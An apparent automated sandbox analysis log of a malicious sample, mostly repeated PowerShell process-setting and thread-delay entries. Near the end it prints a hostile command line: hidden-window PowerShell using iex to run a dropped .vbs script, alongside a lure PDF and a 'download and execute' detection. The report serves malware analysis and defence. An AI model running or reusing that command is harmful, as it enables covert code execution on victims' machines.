      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4771Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5036Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5248Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4514Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 5248 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952Thread sleep count: 4514 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 1644Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000007.00000002.3274442758.0000028B56854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272709392.0000028B5102B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_2696.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2696, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
